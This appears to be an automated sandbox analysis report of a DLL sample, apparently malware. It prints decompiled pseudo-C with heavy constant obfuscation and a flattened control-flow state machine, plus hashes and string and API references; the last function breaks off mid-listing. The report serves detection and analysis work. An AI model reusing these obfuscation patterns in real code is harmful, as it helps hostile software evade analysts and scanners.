Analysis Process: loaddll32.exe PID: 6788 Parent PID: 4588 loaddll32.exeCOMMON

Execution Graph

Execution Coverage:	2.1%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	55.6%
Total number of Nodes:	1017
Total number of Limit Nodes:	6

Executed Functions

Function 02B4EFDD, Relevance: 12.9, Strings: 10, Instructions: 360
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 95%

			E02B4EFDD() {
				char _v520;
				char _v1040;
				char _v1560;
				signed int _v1564;
				signed int _v1568;
				signed int _v1572;
				signed int _v1576;
				signed int _v1580;
				signed int _v1584;
				signed int _v1588;
				signed int _v1592;
				signed int _v1596;
				signed int _v1600;
				signed int _v1604;
				signed int _v1608;
				signed int _v1612;
				signed int _v1616;
				signed int _v1620;
				signed int _v1624;
				signed int _v1628;
				signed int _v1632;
				signed int _v1636;
				signed int _v1640;
				signed int _v1644;
				signed int _v1648;
				signed int _v1652;
				signed int _v1656;
				signed int _v1660;
				signed int _v1664;
				signed int _v1668;
				signed int _v1672;
				signed int _v1676;
				signed int _v1680;
				signed int _v1684;
				signed int _v1688;
				signed int _v1692;
				signed int _v1696;
				signed int _v1700;
				signed int _v1704;
				signed int _v1708;
				signed int _v1712;
				signed int _v1716;
				signed int _v1720;
				signed short* _t381;
				signed int _t393;
				signed int _t395;
				signed int _t397;
				signed int _t398;
				signed int _t399;
				signed int _t400;
				signed int _t401;
				signed int _t402;
				signed int _t403;
				signed int _t404;
				signed int _t405;
				signed int _t415;
				signed int* _t444;
				void* _t445;
				signed int _t449;
				signed int _t450;
				signed short* _t451;
				signed int* _t452;

				_t452 =  &_v1720;
				_v1648 = 0xf9e68a;
				_v1648 = _v1648 ^ 0xa89cfd85;
				_v1648 = _v1648 | 0xe1599fd2;
				_v1648 = _v1648 ^ 0xe97d9ff6;
				_v1592 = 0x52ca29;
				_v1592 = _v1592 + 0xa8c7;
				_v1592 = _v1592 ^ 0x005b0974;
				_v1632 = 0x5fd17f;
				_t397 = 0x55;
				_v1632 = _v1632 / _t397;
				_v1632 = _v1632 + 0x4a14;
				_t395 = 0;
				_v1632 = _v1632 ^ 0x0007d59d;
				_t445 = 0x5f4d19a;
				_v1584 = 0xb2803c;
				_t398 = 0x15;
				_v1584 = _v1584 / _t398;
				_v1584 = _v1584 ^ 0x0001d429;
				_v1700 = 0x18b17c;
				_v1700 = _v1700 >> 4;
				_v1700 = _v1700 << 0xb;
				_v1700 = _v1700 | 0x5bcbde76;
				_v1700 = _v1700 ^ 0x5fd8859a;
				_v1716 = 0x3ed9a0;
				_v1716 = _v1716 >> 2;
				_v1716 = _v1716 | 0xf2214935;
				_v1716 = _v1716 + 0xffff6098;
				_v1716 = _v1716 ^ 0xf2246cf7;
				_v1616 = 0xd3100b;
				_v1616 = _v1616 << 0xb;
				_v1616 = _v1616 ^ 0x988d1f7d;
				_v1576 = 0x49dab3;
				_t399 = 0x41;
				_v1576 = _v1576 / _t399;
				_v1576 = _v1576 ^ 0x00091b0c;
				_v1604 = 0x610b2e;
				_v1604 = _v1604 >> 3;
				_v1604 = _v1604 ^ 0x000d4028;
				_v1708 = 0x5e4148;
				_v1708 = _v1708 * 0x7c;
				_v1708 = _v1708 + 0x543c;
				_v1708 = _v1708 * 0x6e;
				_v1708 = _v1708 ^ 0x9e2c7101;
				_v1580 = 0x8fa7d1;
				_v1580 = _v1580 | 0x5a90bc2e;
				_v1580 = _v1580 ^ 0x5a99780a;
				_v1644 = 0xdfbfec;
				_v1644 = _v1644 ^ 0x5e27e596;
				_v1644 = _v1644 + 0xffff45c7;
				_v1644 = _v1644 ^ 0x5efb0694;
				_v1652 = 0xa5c8eb;
				_v1652 = _v1652 ^ 0x9b43bc99;
				_v1652 = _v1652 * 0x26;
				_v1652 = _v1652 ^ 0x243194e2;
				_v1596 = 0xb87d2a;
				_v1596 = _v1596 ^ 0x06815b6e;
				_v1596 = _v1596 ^ 0x0639024b;
				_v1568 = 0xf0e227;
				_v1568 = _v1568 * 0x3d;
				_v1568 = _v1568 ^ 0x396ce50f;
				_v1572 = 0x747c0d;
				_v1572 = _v1572 + 0xffffb798;
				_v1572 = _v1572 ^ 0x0071a7b9;
				_v1656 = 0x3795ed;
				_v1656 = _v1656 | 0xbce94746;
				_t400 = 0x26;
				_v1656 = _v1656 / _t400;
				_v1656 = _v1656 ^ 0x04ffd641;
				_v1628 = 0xc97098;
				_t401 = 0x3f;
				_v1628 = _v1628 / _t401;
				_v1628 = _v1628 << 2;
				_v1628 = _v1628 ^ 0x0000c1e6;
				_v1664 = 0x186675;
				_v1664 = _v1664 + 0x5979;
				_v1664 = _v1664 + 0xda5e;
				_v1664 = _v1664 ^ 0x0013e2ca;
				_v1672 = 0x37994d;
				_t402 = 0x3c;
				_v1672 = _v1672 / _t402;
				_v1672 = _v1672 << 6;
				_v1672 = _v1672 ^ 0x0033bfe5;
				_v1588 = 0x8a41f;
				_v1588 = _v1588 ^ 0x744a78fd;
				_v1588 = _v1588 ^ 0x744e2179;
				_v1720 = 0x535779;
				_v1720 = _v1720 << 0xd;
				_v1720 = _v1720 + 0x4332;
				_v1720 = _v1720 + 0x735f;
				_v1720 = _v1720 ^ 0x6aed3196;
				_v1692 = 0x449a24;
				_t403 = 0x7f;
				_v1692 = _v1692 / _t403;
				_v1692 = _v1692 >> 0xb;
				_v1692 = _v1692 | 0x1a1cc036;
				_v1692 = _v1692 ^ 0x1a141e74;
				_v1680 = 0xcbdb4c;
				_t404 = 0x32;
				_v1680 = _v1680 / _t404;
				_v1680 = _v1680 + 0xffff62cd;
				_v1680 = _v1680 ^ 0x0005b6c2;
				_v1712 = 0x490fe1;
				_v1712 = _v1712 + 0xffff5c72;
				_v1712 = _v1712 | 0x8d0799de;
				_v1712 = _v1712 + 0xd1c7;
				_v1712 = _v1712 ^ 0x8d59d7bd;
				_v1564 = 0xeb31a6;
				_v1564 = _v1564 + 0x9db9;
				_v1564 = _v1564 ^ 0x00ef2ed2;
				_v1636 = 0x2bc790;
				_v1636 = _v1636 << 0xd;
				_v1636 = _v1636 + 0xc361;
				_v1636 = _v1636 ^ 0x78fc9b03;
				_v1608 = 0x9c27ff;
				_t405 = 0x79;
				_v1608 = _v1608 / _t405;
				_v1608 = _v1608 ^ 0x00083646;
				_v1612 = 0x2811b5;
				_v1612 = _v1612 << 7;
				_v1612 = _v1612 ^ 0x140bb062;
				_v1704 = 0x10f563;
				_v1704 = _v1704 << 7;
				_v1704 = _v1704 + 0x8e91;
				_v1704 = _v1704 >> 1;
				_v1704 = _v1704 ^ 0x043150d1;
				_v1668 = 0xd17281;
				_v1668 = _v1668 + 0xffff6975;
				_v1668 = _v1668 * 5;
				_v1668 = _v1668 ^ 0x041d3199;
				_v1676 = 0x45cf94;
				_v1676 = _v1676 | 0xf5b6f9ff;
				_v1676 = _v1676 ^ 0xf5f7fea4;
				_v1640 = 0xed0f5a;
				_v1640 = _v1640 | 0x16dcab92;
				_v1640 = _v1640 ^ 0xea8ad617;
				_v1640 = _v1640 ^ 0xfc77378a;
				_v1684 = 0xfd4b0d;
				_v1684 = _v1684 ^ 0xf5deb09c;
				_v1684 = _v1684 * 0x14;
				_v1684 = _v1684 ^ 0x26c6ef50;
				_v1600 = 0xb07e76;
				_v1600 = _v1600 + 0x891d;
				_v1600 = _v1600 ^ 0x00bcbcf5;
				_v1660 = 0xdc9573;
				_v1660 = _v1660 | 0xf03871f4;
				_v1660 = _v1660 >> 9;
				_v1660 = _v1660 ^ 0x0071eac7;
				_v1620 = 0x8203d2;
				_v1620 = _v1620 ^ 0xa8466021;
				_v1620 = _v1620 ^ 0xa8c8da0e;
				_v1688 = 0x3e6237;
				_v1688 = _v1688 + 0x1a50;
				_v1688 = _v1688 >> 3;
				_t451 = _v1620;
				_v1688 = _v1688 * 0x2f;
				_v1688 = _v1688 ^ 0x0160f017;
				_v1696 = 0x29d1f1;
				_v1696 = _v1696 + 0xffffde63;
				_v1696 = _v1696 + 0xffff46cf;
				_v1696 = _v1696 * 0x14;
				_v1696 = _v1696 ^ 0x033cdd59;
				_v1624 = 0xc011c7;
				_v1624 = _v1624 + 0xffff119f;
				_v1624 = _v1624 >> 7;
				_v1624 = _v1624 ^ 0x00036cbb;
				while(_t445 != 0x2906f2f) {
					if(_t445 == 0x5f4d19a) {
						E02B4FE2A(_v1592, _v1632, 0x208,  &_v1560);
						_pop(_t405);
						_t445 = 0x2906f2f;
						continue;
					}
					if(_t445 == 0x6d37c50) {
						_t381 = _t451;
						__eflags =  *_t451 - _t395;
						if(__eflags == 0) {
							L17:
							_t445 = 0xfe0ac9e;
							continue;
						} else {
							goto L10;
						}
						do {
							L10:
							__eflags =  *_t381 - 0x2c;
							if( *_t381 != 0x2c) {
								goto L16;
							}
							_t444 =  &_v1560;
							while(1) {
								_t381 =  &(_t381[1]);
								_t415 =  *_t381 & 0x0000ffff;
								__eflags = _t415;
								if(_t415 == 0) {
									break;
								}
								__eflags = _t415 - 0x20;
								if(_t415 == 0x20) {
									break;
								}
								 *_t444 = _t415;
								_t444 =  &(_t444[0]);
								__eflags = _t444;
							}
							_t405 = 0;
							__eflags = 0;
							 *_t444 = 0;
							L16:
							_t381 =  &(_t381[1]);
							__eflags =  *_t381 - _t395;
						} while (__eflags != 0);
						goto L17;
					}
					if(_t445 == 0x88437ca) {
						E02B31A34(_v1572,  &_v1040, _t405, _t405, _v1656, _v1628, _v1664, _t405, _v1648, _v1672);
						E02B50DB1(_v1588,  &_v520, __eflags, _v1720, _v1572, _v1692);
						_push(_v1636);
						_push(_v1564);
						_push(_v1712);
						_t449 = E02B4E1F8(0x2b31160, _v1680, __eflags);
						E02B52D0A(_v1612, __eflags,  &_v520, _v1704, _v1668, _v1676, 0x2b31160, _t451,  &_v1040, _t449);
						_t405 = _t449;
						E02B4FECB(_t405, _v1640, _v1684, _v1600, _v1660);
						_t452 =  &(_t452[0x19]);
						_t445 = 0xc3a6a1c;
						continue;
					}
					if(_t445 == 0xc3a6a1c) {
						_push(_t405);
						E02B485FF(_v1620, _v1688, __eflags, _t395, _t451, _t395, _v1696, _t395, _v1624);
						_t395 = 1;
						__eflags = 1;
						L23:
						return _t395;
					}
					_t462 = _t445 - 0xfe0ac9e;
					if(_t445 == 0xfe0ac9e) {
						_push(_v1576);
						_push(_v1616);
						_push(_v1716);
						_t450 = E02B4E1F8(0x2b31120, _v1700, _t462);
						_t393 = E02B5061D(_v1604, _t450,  &_v1560, _v1708, _v1580); // executed
						_t405 = _t450;
						asm("sbb edi, edi");
						_t445 = ( ~_t393 & 0x02221bd6) + 0x6621bf4;
						E02B4FECB(_t405, _v1644, _v1652, _v1596, _v1568);
						_t452 =  &(_t452[9]);
					}
					L20:
					if(_t445 != 0x6621bf4) {
						continue;
					}
					goto L23;
				}
				_t451 = E02B3C307();
				_t445 = 0x6d37c50;
				goto L20;
			}

0x02b4efdd
0x02b4efe3
0x02b4efed
0x02b4eff5
0x02b4effd
0x02b4f005
0x02b4f010
0x02b4f01b
0x02b4f026
0x02b4f038
0x02b4f03d
0x02b4f043
0x02b4f04b
0x02b4f04d
0x02b4f055
0x02b4f05a
0x02b4f06c
0x02b4f071
0x02b4f07a
0x02b4f085
0x02b4f08d
0x02b4f092
0x02b4f097
0x02b4f09f
0x02b4f0a7
0x02b4f0af
0x02b4f0b4
0x02b4f0bc
0x02b4f0c4
0x02b4f0cc
0x02b4f0d4
0x02b4f0d9
0x02b4f0e1
0x02b4f0f3
0x02b4f0f6
0x02b4f0fd
0x02b4f108
0x02b4f113
0x02b4f11b
0x02b4f126
0x02b4f133
0x02b4f137
0x02b4f144
0x02b4f148
0x02b4f150
0x02b4f15b
0x02b4f166
0x02b4f171
0x02b4f179
0x02b4f181
0x02b4f189
0x02b4f191
0x02b4f199
0x02b4f1a6
0x02b4f1aa
0x02b4f1b2
0x02b4f1bd
0x02b4f1c8
0x02b4f1d3
0x02b4f1e6
0x02b4f1ed
0x02b4f1f8
0x02b4f203
0x02b4f210
0x02b4f21b
0x02b4f223
0x02b4f231
0x02b4f236
0x02b4f23c
0x02b4f244
0x02b4f250
0x02b4f255
0x02b4f25b
0x02b4f260
0x02b4f268
0x02b4f270
0x02b4f278
0x02b4f280
0x02b4f288
0x02b4f294
0x02b4f299
0x02b4f29f
0x02b4f2a4
0x02b4f2ac
0x02b4f2b7
0x02b4f2c2
0x02b4f2cd
0x02b4f2d5
0x02b4f2da
0x02b4f2e2
0x02b4f2ea
0x02b4f2f2
0x02b4f2fe
0x02b4f303
0x02b4f309
0x02b4f30e
0x02b4f316
0x02b4f31e
0x02b4f32a
0x02b4f32f
0x02b4f335
0x02b4f33d
0x02b4f345
0x02b4f34d
0x02b4f355
0x02b4f35d
0x02b4f365
0x02b4f36d
0x02b4f378
0x02b4f383
0x02b4f38e
0x02b4f396
0x02b4f39b
0x02b4f3a3
0x02b4f3ab
0x02b4f3bd
0x02b4f3c0
0x02b4f3c7
0x02b4f3d2
0x02b4f3da
0x02b4f3df
0x02b4f3e7
0x02b4f3ef
0x02b4f3f4
0x02b4f3fc
0x02b4f400
0x02b4f408
0x02b4f410
0x02b4f41d
0x02b4f421
0x02b4f429
0x02b4f431
0x02b4f439
0x02b4f441
0x02b4f449
0x02b4f451
0x02b4f459
0x02b4f461
0x02b4f469
0x02b4f476
0x02b4f47a
0x02b4f482
0x02b4f48d
0x02b4f498
0x02b4f4a3
0x02b4f4ab
0x02b4f4b3
0x02b4f4b8
0x02b4f4c0
0x02b4f4c8
0x02b4f4d0
0x02b4f4d8
0x02b4f4e0
0x02b4f4e8
0x02b4f4f2
0x02b4f4f6
0x02b4f4fa
0x02b4f502
0x02b4f50a
0x02b4f512
0x02b4f51f
0x02b4f523
0x02b4f52b
0x02b4f533
0x02b4f53b
0x02b4f540
0x02b4f548
0x02b4f55a
0x02b4f72e
0x02b4f734
0x02b4f735
0x00000000
0x02b4f735
0x02b4f566
0x02b4f6d1
0x02b4f6d3
0x02b4f6d7
0x02b4f70c
0x02b4f70c
0x00000000
0x00000000
0x00000000
0x00000000
0x02b4f6d9
0x02b4f6d9
0x02b4f6d9
0x02b4f6dd
0x00000000
0x00000000
0x02b4f6df
0x02b4f6f4
0x02b4f6f4
0x02b4f6f7
0x02b4f6fa
0x02b4f6fd
0x00000000
0x00000000
0x02b4f6e8
0x02b4f6ec
0x00000000
0x00000000
0x02b4f6ee
0x02b4f6f1
0x02b4f6f1
0x02b4f6f1
0x02b4f6ff
0x02b4f6ff
0x02b4f701
0x02b4f704
0x02b4f704
0x02b4f707
0x02b4f707
0x00000000
0x02b4f6d9
0x02b4f572
0x02b4f62f
0x02b4f64e
0x02b4f653
0x02b4f65c
0x02b4f663
0x02b4f673
0x02b4f6a2
0x02b4f6ab
0x02b4f6bf
0x02b4f6c4
0x02b4f6c7
0x00000000
0x02b4f6c7
0x02b4f57e
0x02b4f760
0x02b4f778
0x02b4f782
0x02b4f782
0x02b4f786
0x02b4f78f
0x02b4f78f
0x02b4f584
0x02b4f58a
0x02b4f590
0x02b4f59c
0x02b4f5a0
0x02b4f5b4
0x02b4f5cb
0x02b4f5d9
0x02b4f5ef
0x02b4f5f7
0x02b4f5fd
0x02b4f602
0x02b4f602
0x02b4f752
0x02b4f758
0x00000000
0x00000000
0x00000000
0x02b4f75e
0x02b4f74b
0x02b4f74d
0x00000000

Strings

_s, xrefs: 02B4F2E2
|t, xrefs: 02B4F1F8
y!Nt, xrefs: 02B4F2C2
HA^, xrefs: 02B4F126
yWS, xrefs: 02B4F2CD
(@, xrefs: 02B4F11B
<T, xrefs: 02B4F137
7b>, xrefs: 02B4F4D8
t[, xrefs: 02B4F01B
yY, xrefs: 02B4F270

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID:
String ID: |t$(@$7b>$<T$HA^$_s$t[$y!Nt$yWS$yY
API String ID: 0-3414766599
Opcode ID: e60048d681ecf10a4b5dd1cf9e5bc385acb1659bd8c33c9436479e2878e4fdbe
Instruction ID: 19eccd7c60f00fb6fb28924898ed4e5f446c0a300194e35efe87e7391dd1a3dd
Opcode Fuzzy Hash: e60048d681ecf10a4b5dd1cf9e5bc385acb1659bd8c33c9436479e2878e4fdbe
Instruction Fuzzy Hash: 720211725083809FD368CF25C48AA5BBBF2FBC5318F50890DE6D986260DBB59949DF43

Uniqueness

Uniqueness Score: -1.00%

Function 02B5061D, Relevance: 1.3, APIs: 1, Instructions: 52
stringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 79%

			E02B5061D(signed int __ecx, WCHAR* __edx, WCHAR* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				void* _t44;
				int _t53;
				WCHAR* _t56;

				_push(_a12);
				_t56 = __edx;
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E02B4FE29(_t44);
				_v24 = _v24 & 0x00000000;
				_v28 = 0xcd60b7;
				_v12 = 0x7257ab;
				_v12 = _v12 << 0xd;
				_v12 = _v12 + 0x8f69;
				_v12 = _v12 * 0x4c;
				_v12 = _v12 ^ 0x410f7a13;
				_v8 = 0x7b4696;
				_v8 = _v8 + 0xffff4950;
				_v8 = _v8 | 0x2a0f624b;
				_v8 = _v8 * 0x3a;
				_v8 = _v8 ^ 0xa0f3ec54;
				_v20 = 0x8a2161;
				_v20 = _v20 + 0xffff45ea;
				_v20 = _v20 ^ 0x1b6c7fa6;
				_v20 = _v20 ^ 0x1be8dede;
				_v16 = 0xdcc12a;
				_v16 = _v16 + 0xb9f4;
				_v16 = _v16 + 0xffffcfef;
				_v16 = _v16 ^ 0x00d9de04;
				E02B3EB52(__ecx, __ecx, 0xb7861dce, 0x3e, 0xa2289af1);
				_t53 = lstrcmpiW(_a4, _t56); // executed
				return _t53;
			}

0x02b50624
0x02b50627
0x02b50629
0x02b5062c
0x02b5062f
0x02b50630
0x02b50631
0x02b50636
0x02b5063d
0x02b50644
0x02b5064b
0x02b5064f
0x02b50667
0x02b5066a
0x02b50671
0x02b50678
0x02b5067f
0x02b5068b
0x02b5068e
0x02b50695
0x02b5069c
0x02b506a3
0x02b506aa
0x02b506b1
0x02b506b8
0x02b506bf
0x02b506c6
0x02b506d9
0x02b506e5
0x02b506eb

APIs

lstrcmpiW.KERNELBASE(410F7A13,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 02B506E5

Memory Dump Source

Source File: 00000001.00000002.321766377.0000000002B31000.00000020.00000001.sdmp, Offset: 02B30000, based on PE: true

Associated: 00000001.00000002.321760643.0000000002B30000.00000004.00000001.sdmp Download File
Associated: 00000001.00000002.321787146.0000000002B56000.00000004.00000001.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_2b30000_loaddll32.jbxd

Yara matches

Similarity

API ID: lstrcmpi
String ID:
API String ID: 1586166983-0
Opcode ID: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction ID: cdb4fbc6635b7dca51fe40d89b8d67ea50be13804a58a24c6622974a01d526f4
Opcode Fuzzy Hash: ef59b29d425997034e4fed527bf505b0074c5b4e8b9fa1c114afddacbc91d9b0
Instruction Fuzzy Hash: 6A2110B1C01309ABCF14DFA9D9899DEBFB5FB20354F108298E529A7251E3B48B04CF90

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 02B38636, Relevance: 41.2, Strings: 32, Instructions: 1175
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 97%

			E02B38636() {
				signed int _v12;
				signed int _v20;
				intOrPtr _v24;
				signed int _v44;
				char _v56;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				char _v100;
				char _v108;
				signed int _v144;
				char _v152;
				char _v160;
				char _v164;
				char _v168;
				char _v172;
				char _v176;
				signed int _v180;
				signed int _v184;
				unsigned int _v188;
				signed int _v192;
				signed int _v196;
				signed int _v200;
				signed int _v204;
				signed int _v208;
				signed int _v212;
				unsigned int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				signed int _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				signed int _v260;
				signed int _v264;
				unsigned int _v268;
				unsigned int _v272;
				signed int _v276;
				signed int _v280;
				signed int _v284;
				signed int _v288;
				signed int _v292;
				signed int _v296;
				signed int _v300;
				signed int _v304;
				signed int _v308;
				signed int _v312;
				signed int _v316;
				signed int _v320;
				signed int _v324;
				signed int _v328;
				signed int _v332;
				unsigned int _v336;
				signed int _v340;
				signed int _v344;
				signed int _v348;
				signed int _v352;
				signed int _v356;
				signed int _v360;
				signed int _v364;
				signed int _v368;
				signed int _v372;
				signed int _v376;
				signed int _v380;
				signed int _v384;
				signed int _v388;
				signed int _v392;
				signed int _v396;
				signed int _v400;
				signed int _v404;
				signed int _v408;
				signed int _v412;
				signed int _v416;
				signed int _v420;
				signed int _v424;
				signed int _v428;
				signed int _v432;
				signed int _v436;
				signed int _v440;
				signed int _v444;
				unsigned int _v448;
				signed int _v452;
				signed int _v456;
				signed int _v460;
				signed int _v464;
				signed int _v468;
				signed int _v472;
				signed int _v476;
				signed int _v480;
				signed int _v484;
				unsigned int _v488;
				signed int _v492;
				signed int _v496;
				signed int _v500;
				signed int _v504;
				signed int _v508;
				signed int _v512;
				signed int _v516;
				signed int _v520;
				signed int _v524;
				unsigned int _v528;
				signed int _v532;
				signed int _v536;
				signed int _v540;
				signed int _v544;
				signed int _v548;
				signed int _v552;
				unsigned int _v556;
				signed int _v560;
				signed int _v564;
				signed int _v568;
				signed int _v572;
				signed int _v576;
				signed int _v580;
				signed int _v584;
				unsigned int _v588;
				signed int _v592;
				signed int _v596;
				signed int _v600;
				signed int _v604;
				signed int _v608;
				signed int _v612;
				signed int _v616;
				unsigned int _v620;
				signed int _v624;
				signed int _v628;
				signed int _v632;
				signed int _v636;
				signed int _v640;
				signed int _v644;
				signed int _v648;
				signed int _v652;
				signed int _v656;
				signed int _v660;
				signed int _v664;
				signed int _v668;
				signed int _v672;
				unsigned int _v676;
				void* __ebx;
				signed int _t1259;
				signed int _t1286;
				signed int _t1298;
				signed int _t1309;
				signed int _t1339;
				signed int _t1340;
				signed int _t1342;
				signed int _t1343;
				signed int _t1344;
				signed int _t1345;
				signed int _t1346;
				signed int _t1347;
				signed int _t1348;
				signed int _t1349;
				signed int _t1350;
				signed int _t1351;
				signed int _t1352;
				signed int _t1353;
				signed int _t1354;
				signed int _t1355;
				signed int _t1356;
				signed int _t1357;
				signed int _t1358;
				signed int _t1359;
				signed int _t1360;
				signed int _t1361;
				signed int _t1362;
				signed int _t1363;
				signed int _t1364;
				signed int _t1383;
				signed int _t1464;
				signed int _t1465;
				signed int _t1468;
				signed int _t1481;
				signed int _t1494;
				signed int _t1497;
				void* _t1499;
				void* _t1503;
				void* _t1504;
				void* _t1505;

				_t1499 = (_t1497 & 0xfffffff8) - 0x2a0;
				_v548 = 0x612d76;
				_v548 = _v548 + 0xffffb226;
				_v548 = _v548 ^ 0x25733830;
				_v548 = _v548 + 0x94f7;
				_v548 = _v548 ^ 0x25147da1;
				_v608 = 0x8e6410;
				_v608 = _v608 | 0x5e5673b6;
				_v608 = _v608 ^ 0x9913f1ef;
				_v608 = _v608 * 0x3a;
				_t1468 = 0xe6d4a04;
				_v608 = _v608 ^ 0x4490702a;
				_v332 = 0x40e6a4;
				_v332 = _v332 ^ 0x1ba14b53;
				_v332 = _v332 ^ 0x1be1adf7;
				_v388 = 0xd7ca30;
				_t1342 = 0x42;
				_v388 = _v388 / _t1342;
				_v388 = _v388 + 0x3798;
				_v388 = _v388 ^ 0x000f1b75;
				_v216 = 0xd7fc5;
				_v216 = _v216 >> 1;
				_v216 = _v216 ^ 0x0004b337;
				_v516 = 0x59f14d;
				_v516 = _v516 >> 0xf;
				_t1343 = 0x4a;
				_v516 = _v516 / _t1343;
				_v516 = _v516 << 0xb;
				_v516 = _v516 ^ 0x00046054;
				_v304 = 0xedc603;
				_v304 = _v304 + 0xffffc02b;
				_v304 = _v304 ^ 0x00efeb53;
				_v232 = 0x637592;
				_t1464 = 0x6f;
				_t1344 = 0x31;
				_v232 = _v232 * 0x71;
				_v232 = _v232 ^ 0x2bef3074;
				_v372 = 0x919268;
				_v372 = _v372 << 9;
				_v372 = _v372 + 0x904f;
				_v372 = _v372 ^ 0x2324b0cf;
				_v484 = 0x568eb3;
				_v484 = _v484 * 0x42;
				_v484 = _v484 / _t1464;
				_v484 = _v484 ^ 0x0034ded9;
				_v472 = 0x365886;
				_v472 = _v472 << 0xc;
				_v472 = _v472 + 0xffff5d21;
				_v472 = _v472 ^ 0x6583ba5b;
				_v436 = 0xdfd34b;
				_v436 = _v436 / _t1344;
				_v436 = _v436 | 0x191717ac;
				_v436 = _v436 ^ 0x1914e100;
				_v196 = 0xd88df0;
				_t1345 = 0x15;
				_v196 = _v196 / _t1345;
				_v196 = _v196 ^ 0x0009e710;
				_v356 = 0xb64ed2;
				_v356 = _v356 >> 0xd;
				_t1339 = 0x1c;
				_t1346 = 0x51;
				_v356 = _v356 * 0x63;
				_v356 = _v356 ^ 0x0006dcaa;
				_v336 = 0x65c0e5;
				_v336 = _v336 * 0x7a;
				_v336 = _v336 >> 3;
				_v336 = _v336 ^ 0x060f054d;
				_v492 = 0x31a1;
				_v492 = _v492 ^ 0x5b528d22;
				_v492 = _v492 << 5;
				_v492 = _v492 ^ 0x6a59b43c;
				_v652 = 0x40a60;
				_v652 = _v652 | 0x6178721b;
				_v652 = _v652 + 0x8e9b;
				_v652 = _v652 / _t1339;
				_v652 = _v652 ^ 0x037a42dd;
				_v272 = 0xf0169f;
				_v272 = _v272 >> 5;
				_v272 = _v272 ^ 0x0004695a;
				_v528 = 0x24fae7;
				_v528 = _v528 ^ 0xfec3499d;
				_v528 = _v528 << 0xf;
				_v528 = _v528 >> 0xc;
				_v528 = _v528 ^ 0x0001af4c;
				_v188 = 0x9b8757;
				_v188 = _v188 >> 4;
				_v188 = _v188 ^ 0x000b2d6a;
				_v256 = 0x948fd;
				_v256 = _v256 ^ 0xf30bafdb;
				_v256 = _v256 ^ 0xf30b6e1f;
				_v464 = 0x93fe09;
				_v464 = _v464 / _t1346;
				_t1347 = 0x23;
				_v464 = _v464 * 0x7a;
				_v464 = _v464 ^ 0x00d327e8;
				_v648 = 0xd540cd;
				_v648 = _v648 * 0x5c;
				_v648 = _v648 >> 0xb;
				_v648 = _v648 / _t1347;
				_v648 = _v648 ^ 0x0005d45a;
				_v540 = 0x2acc1;
				_v540 = _v540 >> 7;
				_v540 = _v540 << 0x10;
				_t1348 = 0x59;
				_v540 = _v540 / _t1348;
				_v540 = _v540 ^ 0x000fef6f;
				_v264 = 0xfe7d93;
				_v264 = _v264 ^ 0x4bd787a7;
				_v264 = _v264 ^ 0x4b22b45d;
				_v208 = 0x23d5c9;
				_v208 = _v208 ^ 0x8f5a829d;
				_v208 = _v208 ^ 0x8f7555ae;
				_v524 = 0x2aaed2;
				_v524 = _v524 | 0x9661325e;
				_t1494 = 0x5c;
				_v524 = _v524 / _t1494;
				_v524 = _v524 * 0x63;
				_v524 = _v524 ^ 0xa1d330ca;
				_v612 = 0x173148;
				_v612 = _v612 >> 5;
				_v612 = _v612 + 0x14e7;
				_v612 = _v612 / _t1348;
				_v612 = _v612 ^ 0x0000773b;
				_v620 = 0xe48585;
				_v620 = _v620 << 0x10;
				_v620 = _v620 * 0x32;
				_v620 = _v620 >> 7;
				_v620 = _v620 ^ 0x0028030c;
				_v500 = 0xfd3bdc;
				_v500 = _v500 << 0xa;
				_v500 = _v500 ^ 0xf4e13163;
				_v520 = 0xe4fc5f;
				_v520 = _v520 + 0xa13e;
				_v520 = _v520 + 0xffff7828;
				_v520 = _v520 ^ 0x4d340404;
				_v520 = _v520 ^ 0x4dd63175;
				_v360 = 0x9532ce;
				_v360 = _v360 ^ 0xdad74cca;
				_v360 = _v360 | 0x8468d9e2;
				_v360 = _v360 ^ 0xde69f572;
				_v604 = 0x3a7c91;
				_v604 = _v604 | 0x10f1a45d;
				_v604 = _v604 + 0xffff6d1e;
				_v604 = _v604 | 0x776d764a;
				_v604 = _v604 ^ 0x77f7c5e5;
				_v212 = 0x6e3f57;
				_t279 =  &_v212; // 0x6e3f57
				_v212 =  *_t279 * 3;
				_v212 = _v212 ^ 0x01468193;
				_v220 = 0x58f789;
				_v220 = _v220 << 5;
				_v220 = _v220 ^ 0x0b1ef21b;
				_v236 = 0x737654;
				_v236 = _v236 + 0xe2b4;
				_v236 = _v236 ^ 0x0073a4da;
				_v416 = 0xc8c3a8;
				_v416 = _v416 ^ 0x4478b906;
				_v416 = _v416 * 0xc;
				_v416 = _v416 ^ 0x384ff3ff;
				_v576 = 0x407f47;
				_v576 = _v576 + 0x1a0d;
				_v576 = _v576 * 0x63;
				_v576 = _v576 << 2;
				_v576 = _v576 ^ 0x63e80fef;
				_v228 = 0x9b4b6;
				_v228 = _v228 + 0xffffd2d4;
				_v228 = _v228 ^ 0x000d2243;
				_v552 = 0xb96e33;
				_v552 = _v552 + 0x4381;
				_v552 = _v552 * 0xf;
				_v552 = _v552 + 0xffffbee9;
				_v552 = _v552 ^ 0x0ae545e5;
